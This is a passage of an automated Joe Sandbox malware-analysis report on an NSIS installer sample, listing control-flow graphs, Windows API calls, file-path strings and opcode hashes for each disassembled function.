                                                • Instruction Fuzzy Hash: 99F03076600304FFEB009F69DD09E9BB7A9EF95710F11803BE900E7250E6B199549B64

                                                Control-flow Graph

                                                control_flow_graph 1028 10001759-10001795 call 10001b18 1032 100018a6-100018a8 1028->1032 1033 1000179b-1000179f 1028->1033 1034 100017a1-100017a7 call 10002286 1033->1034 1035 100017a8-100017b5 call 100022d0 1033->1035 1034->1035 1040 100017e5-100017ec 1035->1040 1041 100017b7-100017bc 1035->1041 1042 1000180c-10001810 1040->1042 1043 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 1040->1043 1044 100017d7-100017da 1041->1044 1045 100017be-100017bf 1041->1045 1049 10001812-1000184c call 100015b4 call 100024a4 1042->1049 1050 1000184e-10001854 call 100024a4 1042->1050 1065 10001855-10001859 1043->1065 1044->1040 1051 100017dc-100017dd call 10002b57 1044->1051 1047 100017c1-100017c2 1045->1047 1048 100017c7-100017c8 call 1000289c 1045->1048 1053 100017c4-100017c5 1047->1053 1054 100017cf-100017d5 call 10002640 1047->1054 1061 100017cd 1048->1061 1049->1065 1050->1065 1064 100017e2 1051->1064 1053->1040 1053->1048 1069 100017e4 1054->1069 1061->1064 1064->1069 1070 10001896-1000189d 1065->1070 1071 1000185b-10001869 call 10002467 1065->1071 1069->1040 1070->1032 1076 1000189f-100018a0 GlobalFree 1070->1076 1078 10001881-10001888 1071->1078 1079 1000186b-1000186e 1071->1079 1076->1032 1078->1070 1081 1000188a-10001895 call 1000153d 1078->1081 1079->1078 1080 10001870-10001878 1079->1080 1080->1078 1082 1000187a-1000187b FreeLibrary 1080->1082 1081->1070 1082->1078
                                                APIs
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                  • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                  • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                  • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                 • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                 • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                 • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarylstrcpy
                                                • String ID:
                                                • API String ID: 1791698881-3916222277
                                                • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761

                                                 Control-flow Graph (basic blocks of the function at 4023de, rebuilt from the graph data; "->" lists each block's successors)
                                                 • 1085: 4023de-40240f, call 402c37 (x2), call 402cc7 -> 1092, 1093
                                                 • 1092: 402415-40241f -> 1095, 1096
                                                 • 1093: 402abf-402ace (no successors)
                                                 • 1095: 402421-40242e, call 402c37, lstrlenW -> 1096
                                                 • 1096: 402432-402435 -> 1097, 1098
                                                 • 1097: 402437-402448, call 402c15 -> 1098
                                                 • 1098: 402449-40244c -> 1102, 1103
                                                 • 1102: 40245d-402471, RegSetValueExW -> 1107, 1108
                                                 • 1103: 40244e-402458, call 4030fa -> 1102
                                                 • 1107: 402473 -> 1108
                                                 • 1108: 402476-402557, RegCloseKey -> 1093, 1110
                                                 • 1110: 402885-40288c -> 1093
                                                APIs
                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp,00000023,00000011,00000002), ref: 00402429
                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp,00000000,00000011,00000002), ref: 00402469
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp,00000000,00000011,00000002), ref: 00402551
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CloseValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp
                                                • API String ID: 2655323295-1618862768
                                                • Opcode ID: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                • Instruction ID: 6bb9d856f7880fc58a9027dca602f60b1bf716c37025aa19f03bdcb786be9778
                                                • Opcode Fuzzy Hash: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                • Instruction Fuzzy Hash: 33118171E00108AEEB10AFA5DE49EAEBAB8EB54354F11843AF504F71D1DBB84D419B58
                                                APIs
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Close$Enum
                                                • String ID:
                                                • API String ID: 464197530-0
                                                • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                • Instruction ID: 79d7ed05643b621c8e133add132d673d265f3a1e436d48668917152172a1be90
                                                • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                • Instruction Fuzzy Hash: AD116A32540509FBDF129F90CE09BEE7B69EF58340F110036B905B50E0E7B5DE21AB68
                                                APIs
                                                  • Part of subcall function 00405BFE: CharNextW.USER32(?,?,0042FA50,?,00405C72,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C0C
                                                  • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                  • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                  • Part of subcall function 004057B5: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular,?,00000000,000000F0), ref: 0040164D
                                                Strings
                                                • C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular, xrefs: 00401640
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular
                                                • API String ID: 1892508949-3139891972
                                                • Opcode ID: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                • Instruction ID: f4fc84295b44ed4b17ac4e1ae603b231d2bd930c419d474b78473434f223dd35
                                                • Opcode Fuzzy Hash: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                • Instruction Fuzzy Hash: 7711BE31504104ABCF316FA4CD01AAF36A0EF14368B28493BEA45B22F1DB3E4E519A4E
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00405289
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004052DA
                                                  • Part of subcall function 00404263: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404275
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                • Instruction ID: e35359e86d41fb5d6968ee62a371e6abd11f03428b82ac61abb391d392e116c6
                                                • Opcode Fuzzy Hash: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                • Instruction Fuzzy Hash: 0E017131510609ABDF209F51DD84A5B3A25EF84754F5000BBFA04751D1C77A9C929E6E
                                                APIs
                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063C4,80000002), ref: 00406196
                                                • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID: Call
                                                • API String ID: 3356406503-1824292864
                                                • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                • Instruction ID: ccae29ee16f81b62eed190a0e72f85d1395cd89474178e8bc9e2f9375c5b4726
                                                • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                • Instruction Fuzzy Hash: C7017172510209EADF21CF55CD05EDF3BA8EB54360F018035FD1596191D779D968CBA4
                                                APIs
                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                • CloseHandle.KERNEL32(?), ref: 0040589D
                                                Strings
                                                • Error launching installer, xrefs: 0040587A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                • Instruction ID: d54ab7d3c02f92ec190dfac26e1bcd6e14271da7ed0e34d6283108f8b7c5a0e7
                                                • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                • Instruction Fuzzy Hash: D4E09AB5900209BFEB109F65DD49F7B77ACEB04744F004565BD50F2150D778D8148A78
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                  • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                  • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 334405425-0
                                                • Opcode ID: 864119935e3c92a972c97e6683a8f1d17c59749ba81c3d86f0a55431c134cf0a
                                                • Instruction ID: 42f79ed1eba5b951ee52ea84f7896f3e8cd2b7b6c2435203e6ffc1da5cb37fd9
                                                • Opcode Fuzzy Hash: 864119935e3c92a972c97e6683a8f1d17c59749ba81c3d86f0a55431c134cf0a
                                                • Instruction Fuzzy Hash: EF21C271900208EACF20AFA5CE4DAAE7A70AF04358F64413BF611B51E0DBBD8941DA5E
                                                APIs
                                                • GlobalFree.KERNEL32(00791940), ref: 00401BE1
                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree
                                                • String ID: Call
                                                • API String ID: 3394109436-1824292864
                                                • Opcode ID: 84467de0dce396edb77585f845136cbcf2c5fb7762c5f8c3cd98e46705f302be
                                                • Instruction ID: 92ace51ac37ea5806125e07fe733601b5cdc010b72bea360b2f02f73c4ad7c89
                                                • Opcode Fuzzy Hash: 84467de0dce396edb77585f845136cbcf2c5fb7762c5f8c3cd98e46705f302be
                                                • Instruction Fuzzy Hash: 4921C072A01100DFDB20EB94CE8495A76A9AF44318725013BF902F72D1DA78A9519B5D
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000), ref: 1000295B
                                                • GetLastError.KERNEL32 ref: 10002A62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                 • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                 • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                 • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastPointer
                                                • String ID:
                                                • API String ID: 2976181284-0
                                                • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                APIs
                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024AF
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp,00000000,00000011,00000002), ref: 00402551
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID:
                                                • API String ID: 3356406503-0
                                                • Opcode ID: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                • Instruction ID: 5dbb434a41a715d7517c89e318d331cd35bfdf9d93bbd69694c25902619df99f
                                                • Opcode Fuzzy Hash: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                • Instruction Fuzzy Hash: DC11A331910209EFEF24DFA4CA585BEB6B4EF04354F21843FE046A72C0D7B84A45DB59
                                                APIs
                                                  • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                  • Part of subcall function 00405BFE: CharNextW.USER32(?,?,0042FA50,?,00405C72,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C0C
                                                  • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                  • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                • lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405CB4
                                                • GetFileAttributesW.KERNELBASE(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00405CC4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID:
                                                • API String ID: 3248276644-0
                                                • Opcode ID: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                • Instruction ID: 85ea7651a51856ee7c4c0712bbf35357d52fdd33bb29f336d43f3a771a20a055
                                                • Opcode Fuzzy Hash: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                • Instruction Fuzzy Hash: 0DF0F925109F5215F622323A1D09EAF2554CF83368716463FF952B16D5DA3C99038D7D
                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                APIs
                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CloseDeleteValue
                                                • String ID:
                                                • API String ID: 2831762973-0
                                                • Opcode ID: 521e33bf1c8ff9c3df6ac7757e7f8edd3bb41d92ca0b3b7281954678aee4cd22
                                                • Instruction ID: a65daa511511277569afb244ca8fe97b80a25767db049908362439423f8cf232
                                                • Opcode Fuzzy Hash: 521e33bf1c8ff9c3df6ac7757e7f8edd3bb41d92ca0b3b7281954678aee4cd22
                                                • Instruction Fuzzy Hash: E5F09632A041149BE711BBA49B4EABEB2A99B44354F16043FFA02F71C1DEFC4D41966D
                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                • Instruction ID: 09ae210f1740f3e2fd0b4033472822fcab18c129469b5f5a82ca29d8a3c9addd
                                                • Opcode Fuzzy Hash: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                • Instruction Fuzzy Hash: DEE09232E082008FD7149BA5AA494AD77B4EB84364720403FE112F11C1DA7848418F59
                                                APIs
